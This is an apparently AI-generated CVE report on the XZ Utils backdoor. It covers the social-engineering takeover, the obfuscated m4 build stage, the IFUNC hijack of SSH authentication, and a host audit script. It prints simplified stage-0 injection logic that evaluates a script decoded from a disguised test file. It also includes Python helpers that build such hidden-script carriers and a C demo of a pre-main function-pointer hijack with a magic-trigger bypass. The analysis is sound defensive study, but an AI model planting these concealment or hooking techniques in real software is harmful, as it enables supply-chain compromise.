CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

© 2026 CVEReports. All rights reserved.

Powered by Google Gemini & CVE Feed

CVE-2024-3094
CVSS 10.0 | EPSS 8.00%

The 500ms Delay That Saved the Internet: Dissecting the XZ Utils Backdoor

Amit Schendel
Senior Security Researcher • December 31, 2025 • 4 min read
Weaponized
CISA KEV Listed

Executive Summary (TL;DR)

A malicious backdoor was intentionally planted in XZ Utils (liblzma) versions 5.6.0 and 5.6.1. On distributions that patch OpenSSH to send systemd notifications, sshd loads libsystemd, which in turn loads liblzma, so the backdoor ends up inside the SSH daemon. There it hooks RSA public-key authentication, allowing an attacker who holds the matching private key to execute commands before authentication completes by embedding a signed payload in the RSA public key sent during an SSH login. It was discovered by accident because of roughly 500 ms of extra login latency.

In one of the most sophisticated supply chain attacks in history, a maintainer known as 'Jia Tan' spent years infiltrating the XZ Utils project to plant a backdoor. This vulnerability allows an attacker with a specific private key to execute arbitrary code as root on affected Linux systems via SSH, bypassing authentication completely.

The Hook: When Inefficiency Becomes Suspicious

Most critical vulnerabilities are accidents—a buffer overflow here, a logic error there. This is not that. This is a masterclass in patience and malice. CVE-2024-3094 isn't a bug; it's a warhead.

It all started when Andres Freund, a PostgreSQL developer at Microsoft, noticed that SSH logins on a Debian sid machine were taking about half a second longer than they should, and that sshd was burning CPU while doing it. Most of us would blame DNS or just restart the service. Andres grabbed a profiler.

He found that liblzma, the compression library at the core of XZ Utils, was doing things it had no business doing inside the SSH daemon. Why is a compression library hanging out in your secure shell? Upstream OpenSSH does not link it, but several distributions patch sshd to send systemd readiness notifications; that pulls in libsystemd, and libsystemd links liblzma. This created the perfect vector: a ubiquitous, boring library that nobody audits, running inside the most sensitive process on a Linux server.

The Long Con: Social Engineering at Scale

Before we look at the code, we have to respect the hustle. The persona 'Jia Tan' didn't just hack a server; they hacked the human trust model of open source. Starting in 2021, they submitted helpful patches. They fixed bugs. They answered emails. Meanwhile, a handful of accounts that now look like sock puppets pressured the original maintainer, Lasse Collin, who had said publicly that long-term mental health issues limited his time, to hand off more of the work. Jia Tan was the convenient volunteer and was granted commit access.

[!NOTE] The Lesson: This wasn't a technical exploit of code; it was an exploit of maintainer burnout.

By 2024, Jia Tan was a trusted maintainer and release manager. They used this trust to ship the backdoor in the release tarballs of versions 5.6.0 and 5.6.1. Note the distinction: the hostile build script (a modified build-to-host.m4) was never in the public Git repository; it existed only in the tarballs. The payload it activated, however, had been committed to Git in plain sight, hidden inside binary test files that looked like deliberately corrupted archives.

The Code: Hide and Seek in M4

The brilliance of this attack lies in its build-system obfuscation. The attacker didn't just write if (attacker) grant_root(). They hid the logic in build-to-host.m4, a macro file used during the ./configure stage.

This macro ran a first stage recovered from a 'test file' (tests/files/bad-3-corrupt_lzma2.xz): after a byte-substitution step the file becomes a valid xz stream whose decompressed content is a shell script. That stage in turn carved a second, larger script and a pre-compiled object file out of tests/files/good-large_compressed.lzma, and the second stage modified the Makefile so that the object file was linked into liblzma. Here is a simplified view of the first stage of the injection logic:

# Simplified view of the stage-0 logic hidden in build-to-host.m4. The real
# chain only continues on x86_64 Linux (that test lives in a later stage).
if echo "$build" | grep -Eq '^x86_64' && echo "$build" | grep -Eq 'linux-gnu$'; then
    # Locate the carrier 'test file' by the ####xxxxx#### marker at the end of a line
    gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
    # Undo the byte substitution (tab<->space, '-'<->'_'), decompress, run as shell
    gl_path_map='tr "\t \-_" " \t_\-"'
    eval "$(sed "r\n" $gl_am_configmake | eval $gl_path_map | xz -d 2>/dev/null)"
fi

The script was designed to look like standard autotools noise, a dialect so unreadable that even seasoned C developers gloss over it. That is what let the backdoor survive casual inspection: nobody reads generated m4, and the payload itself lived in files that a reviewer would expect to be garbage.
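To see how little it takes to hide a script this way, here is the byte-substitution layer implemented in Python. This is an added example, not code from the xz project or from the backdoor: the two tr operands are the ones quoted in Andres Freund's oss-security disclosure (the disclosure's `sed "r\n"` step is effectively a cat and is omitted), while the chunk-carving geometry and the carrier files the helpers build are constructed for demonstration and are not the real offsets.

```python
"""tr(1)-style byte substitution of the kind used to hide the XZ backdoor's build stages.

This is an added example, not code from the xz project or from the backdoor.
The two translation tables reproduce the tr(1) operands quoted in Andres
Freund's oss-security disclosure; the carve geometry (skip/keep sizes, tail
offset) is a parameter here rather than the real numbers, and the carriers
built by the helpers at the bottom are constructed for demonstration.
"""
import lzma
import re

# One token of a tr operand: an octal escape, a backslash-escaped char, or a literal.
_TOKEN = re.compile(r'\\([0-7]{1,3})|\\(.)|(.)', re.S)


def expand_tr_set(spec: str) -> bytes:
    """Expand a tr operand: octal escapes, \\t and \\n, escaped literals and a-b ranges."""
    toks = []  # (byte value, was it escaped?)  An escaped '-' is never a range operator.
    for octal, esc, lit in _TOKEN.findall(spec):
        if octal:
            toks.append((int(octal, 8), True))
        elif esc:
            toks.append(({'n': 10, 't': 9}.get(esc, ord(esc)), True))
        else:
            toks.append((ord(lit), False))
    out = bytearray()
    i = 0
    while i < len(toks):
        if i + 2 < len(toks) and toks[i + 1] == (ord('-'), False):
            out.extend(range(toks[i][0], toks[i + 2][0] + 1))
            i += 3
        else:
            out.append(toks[i][0])
            i += 1
    return bytes(out)


def tr_table(set1: str, set2: str) -> bytes:
    """256-entry translation table with tr(1) semantics (set2 padded with its last byte)."""
    a, b = expand_tr_set(set1), expand_tr_set(set2)
    b = b + b[-1:] * (len(a) - len(b))
    return bytes.maketrans(a, b[:len(a)])


# Stage 0, run from build-to-host.m4: swap tab<->space and '-'<->'_', then `xz -d`.
STAGE0 = tr_table(r'\t \-_', r' \t_\-')
# Stage 1, run by the extracted script: a full byte permutation, then `xz -F raw --lzma1 -d`.
STAGE1 = tr_table(r'\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131', r'\0-\377')


def decode_stage0(carrier: bytes) -> bytes:
    """Recover the stage-1 shell script from a bad-3-corrupt_lzma2.xz-style carrier."""
    return lzma.decompress(bytes(carrier).translate(STAGE0))


def carve(stream: bytes, skip: int, keep: int, tail_from: int) -> bytes:
    """Mimic the chain of `head -c` skip/keep steps followed by `tail -c +N` (1-indexed)."""
    kept = bytearray()
    pos = 0
    while pos < len(stream):
        pos += skip                      # (head -c +skip >/dev/null)
        kept += stream[pos:pos + keep]   # head -c +keep
        pos += keep
    return bytes(kept[tail_from - 1:])


def decode_stage1(carrier: bytes, skip: int, keep: int, tail_from: int) -> bytes:
    """Recover the stage-2 script: `xz -dc`, carve, tr, then raw LZMA1 decode."""
    inner = carve(lzma.decompress(carrier), skip, keep, tail_from).translate(STAGE1)
    return lzma.decompress(inner, format=lzma.FORMAT_RAW,
                           filters=[{'id': lzma.FILTER_LZMA1}])


def invert(table: bytes) -> bytes:
    """Inverse of a bijective translation table."""
    inv = bytearray(256)
    for src, dst in enumerate(table):
        inv[dst] = src
    return bytes(inv)


def build_stage0_carrier(script: bytes) -> bytes:
    """Constructed carrier for testing: compress, then apply the (self-inverse) swap."""
    return lzma.compress(script, format=lzma.FORMAT_XZ).translate(STAGE0)


def build_stage1_carrier(script: bytes, skip: int, keep: int, junk: int) -> bytes:
    """Constructed carrier for testing: raw LZMA1, inverse tr, junk prefix, interleave, .lzma."""
    raw = lzma.compress(script, format=lzma.FORMAT_RAW, filters=[{'id': lzma.FILTER_LZMA1}])
    hidden = b'\0' * junk + raw.translate(invert(STAGE1))
    stream = b''.join(b'\xff' * skip + hidden[i:i + keep] for i in range(0, len(hidden), keep))
    return lzma.compress(stream, format=lzma.FORMAT_ALONE)
```

Point decode_stage0 at the real tests/files/bad-3-corrupt_lzma2.xz from a 5.6.x tarball and the output is the stage-1 shell script; decode_stage1 needs the skip/keep chain and tail offset that script spells out, which is why they are parameters here. The same operand parser lets you audit any other tr one-liner a build script hands you, which is the habit this incident should leave behind.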

The Mechanism: Abusing IFUNC

Once linked, how does a compression library hijack SSH? The attacker used the GNU Indirect Function (IFUNC) mechanism. IFUNC is intended to allow a program to select the most optimized version of a function (e.g., memcpy) at runtime based on the CPU's capabilities.

The backdoor ships its own resolver for liblzma's CRC functions. When the dynamic linker loads liblzma it calls that resolver during relocation, before main() runs and before RELRO makes the GOT read-only. The resolver doesn't just check CPU features; it walks the loaded ELF objects looking for the GOT entry of RSA_public_decrypt, and because libcrypto's symbols may not be bound yet at that moment, it also hooks the linker's symbol-binding path so the replacement lands as soon as that symbol is resolved.

It replaces the real RSA_public_decrypt function pointer with its own malicious wrapper. From then on, every RSA public-key authentication attempt passes the client's key through the backdoor before OpenSSL ever sees it.

The Exploit: The Magic Key

The backdoor is an RCE, but only for the person holding the private key. It doesn't allow anyone to log in; it allows Jia Tan to log in.

Inside the hijacked RSA_public_decrypt, the code inspects the incoming RSA public key. The modulus N is where the hidden payload lives: a command signed with the attacker's Ed448 private key. The crypto inside the backdoor is surprisingly robust, using a ChaCha20 implementation to decrypt the command payload.

If the signature verifies correctly against the public key hardcoded in the backdoor:

  1. The command is extracted.
  2. It is passed directly to system().
  3. The backdoor skips the rest of authentication and executes the command as root, inside the pre-authentication sshd process.

If the signature fails? It falls back to the original RSA_public_decrypt, and the login proceeds normally. This made the backdoor nearly invisible to network scanners: without the private key there is no request that behaves differently from a clean server.
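Both the IFUNC mechanism described above and the fall-through behaviour just described fit in one small program. This is an added example written for this page; it is not the backdoor's code and uses no OpenSSL. real_verify and hooked_verify stand in for RSA_public_decrypt and its wrapper, got_slot is a function-pointer table we own rather than the real GOT, and the 5-byte string MAGIC stands in for a payload that verifies under the attacker's key. It needs gcc or clang on a glibc/ELF system, where __attribute__((ifunc)) is honoured.

```c
/* Added example; not code from the xz backdoor or from any named project.
 * It shows the two properties the backdoor relies on: a GNU IFUNC resolver
 * runs inside ld.so while relocations are being applied, before main(), and
 * at that moment it can rewrite a function-pointer table and still hand back
 * a perfectly ordinary implementation.  got_slot is our own stand-in for a
 * GOT entry; real_verify/hooked_verify stand in for RSA_public_decrypt and
 * its malicious wrapper; "MAGIC" stands in for the attacker-signed payload. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

typedef int (*verify_fn)(const unsigned char *sig, size_t len);
typedef unsigned (*crc_fn)(const unsigned char *p, size_t n);

/* Legitimate verifier: the only "signature" it accepts is the constructed GOOD. */
static int real_verify(const unsigned char *sig, size_t len) {
    return len == 4 && memcmp(sig, "GOOD", 4) == 0;
}

/* Malicious wrapper: a private trigger first, otherwise defer to the original,
 * so every ordinary login behaves exactly as before. */
static verify_fn original_verify;
static int hooked_verify(const unsigned char *sig, size_t len) {
    if (len == 5 && memcmp(sig, "MAGIC", 5) == 0)
        return 1;                        /* attacker's payload: "verified" */
    return original_verify(sig, len);    /* everyone else: the real check */
}

/* Stand-in for the GOT slot the rest of the program calls through. */
static verify_fn got_slot = real_verify;
static int resolver_ran;

/* Two CRC-32 implementations, as a real crc resolver would choose between. */
static unsigned crc32_generic(const unsigned char *p, size_t n) {
    unsigned crc = 0xFFFFFFFFu;
    for (size_t i = 0; i < n; i++) {
        crc ^= p[i];
        for (int k = 0; k < 8; k++)
            crc = (crc >> 1) ^ (0xEDB88320u & (0u - (crc & 1u)));
    }
    return ~crc;
}
static unsigned crc32_fast(const unsigned char *p, size_t n) {
    return crc32_generic(p, n);          /* would be the SIMD build in a real library */
}

/* The IFUNC resolver.  ld.so calls it during relocation; nothing in main() does.
 * Side effect: it hijacks the table entry while the table is still writable.
 * (The real backdoor located the target by walking the GOT; here the table is
 * ours, so the original pointer is simply known.) */
static crc_fn crc32_resolver(void) {
    resolver_ran = 1;
    original_verify = real_verify;
    got_slot = hooked_verify;
    return crc32_fast;
}

/* The exported symbol: callers see a normal function, the loader sees an IFUNC. */
unsigned crc32_ifunc(const unsigned char *p, size_t n) __attribute__((ifunc("crc32_resolver")));

int ifunc_resolver_ran(void) { return resolver_ran; }

/* What sshd would do: call the verifier through the table it trusts. */
int verify_via_table(const unsigned char *sig, size_t len) { return got_slot(sig, len); }

int main(void) {
    printf("resolver ran before main: %d\n", ifunc_resolver_ran());
    printf("crc32(\"abc\") = %08x\n", crc32_ifunc((const unsigned char *)"abc", 3));
    printf("GOOD -> %d, BAD! -> %d, MAGIC -> %d\n",
           verify_via_table((const unsigned char *)"GOOD", 4),
           verify_via_table((const unsigned char *)"BAD!", 4),
           verify_via_table((const unsigned char *)"MAGIC", 5));
    return 0;
}
```

Build with `cc -O2 ifunc_demo.c` and run it; the table has already been rewired by the time main() prints its first line, and the CRC the caller gets back is a correct CRC-32, which is exactly why the hijack is invisible to the code that triggered it. What this example cannot show without an ELF parser is how the real resolver found sshd's GOT entry for a symbol living in a different library; that is the part that walks the loaded objects.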

Official Patches

  • Debian: Debian Security Tracker
  • Red Hat: Red Hat Customer Portal


Technical Appendix

CVSS Score: 10.0 / 10 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
EPSS Probability: 8.00% (top 4% most exploited)

Affected Systems

  • Fedora Rawhide
  • Fedora 40 Beta
  • Debian Unstable (Sid)
  • Kali Linux
  • openSUSE Tumbleweed
  • Arch Linux

Affected Versions Detail

  • xz-utils (Tukaani Project): 5.6.0 affected, fixed in 5.6.2
  • xz-utils (Tukaani Project): 5.6.1 affected, fixed in 5.6.2

  • CWE ID: CWE-506
  • Attack Vector: Network (Supply Chain)
  • CVSS v3.1: 10.0 (Critical)
  • Impact: RCE / Auth Bypass
  • Exploit Status: Weaponized (In the wild)
  • Complexity: High (Nation-state level)
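The two facts a host audit can act on from this table are the affected version range and the libsystemd route by which sshd reaches liblzma. The script below turns them into checks; it is an added example, not tooling from this report or the xz project, and the xz and ldd output strings it embeds are constructed for the stand-alone run. It only answers "is the compromised package present and reachable from sshd"; it does not exercise the backdoor itself, which is what the xzbot and Nuclei resources listed on this page are for.

```sh
#!/bin/sh
# Added example, not part of the original report or of the xz project.
# Two host checks a practitioner would script from the affected-versions table:
#   1. does the installed xz report an affected release (5.6.0 or 5.6.1)?
#   2. does sshd actually link liblzma (the libsystemd path the backdoor needs)?
# Both take text so they can be run on captured output; the samples at the
# bottom are constructed, not taken from a real host.

# Return 0 if the first line of `xz --version` names an affected release,
# 1 if it names any other version, 2 if the line cannot be parsed at all
# (unknown is reported separately rather than silently treated as safe).
xz_version_affected() {
    ver=$(printf '%s\n' "$1" | sed -n 's/^xz (XZ Utils) \([0-9][0-9.]*\).*/\1/p' | head -n 1)
    [ -n "$ver" ] || return 2
    case "$ver" in
        5.6.0|5.6.1) return 0 ;;
        *)           return 1 ;;
    esac
}

# Return 0 and print the resolved library path if `ldd` output lists liblzma;
# ldd shows transitive dependencies, so the libsystemd -> liblzma hop is visible.
sshd_links_liblzma() {
    printf '%s\n' "$1" | awk '$1 ~ /^liblzma\.so/ { print $3; found = 1 } END { exit !found }'
}

# Constructed sample output for a stand-alone run (not from a real host).
SAMPLE_XZ='xz (XZ Utils) 5.6.1
liblzma 5.6.1'
SAMPLE_LDD='	linux-vdso.so.1 (0x00007ffd1a3f0000)
	libsystemd.so.0 => /lib/x86_64-linux-gnu/libsystemd.so.0 (0x00007f3c2a000000)
	liblzma.so.5 => /lib/x86_64-linux-gnu/liblzma.so.5 (0x00007f3c29fc0000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f3c29d00000)'

xz_version_affected "$SAMPLE_XZ" && echo "xz version is in the affected range"
path=$(sshd_links_liblzma "$SAMPLE_LDD") && echo "sshd loads $path"

# On a live host (root is usually needed to locate sshd):
#   xz_version_affected "$(xz --version)" && sshd_links_liblzma "$(ldd "$(command -v sshd)")"
```

One caveat for the live form: ldd runs the dynamic loader against the binary you hand it, so on a host you already suspect, prefer copying sshd off the machine and inspecting it there.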

MITRE ATT&CK Mapping

  • T1195.001 Supply Chain Compromise: Compromise Software Dependencies and Development Tools (Initial Access)
  • T1574.006 Hijack Execution Flow: Dynamic Linker Hijacking (Persistence)
  • T1059.004 Command and Scripting Interpreter: Unix Shell (Execution)

CWE-506: Embedded Malicious Code

Embedded Malicious Code. The product contains code that appears to be benign but performs malicious actions, such as a logic bomb or backdoor.

Exploit Resources

Known Exploits & Detection

  • GitHub: xzbot, exploit tooling to detect and trigger the backdoor
  • Openwall: original disclosure by Andres Freund, including reproduction steps
  • Nuclei: detection template available

Vulnerability Timeline

  • 2021-02-01: Jia Tan (JiaT75) creates GitHub account
  • 2024-02-24: XZ version 5.6.0 released with backdoor
  • 2024-03-09: XZ version 5.6.1 released with 'fixes'
  • 2024-03-29: Andres Freund posts discovery to oss-security

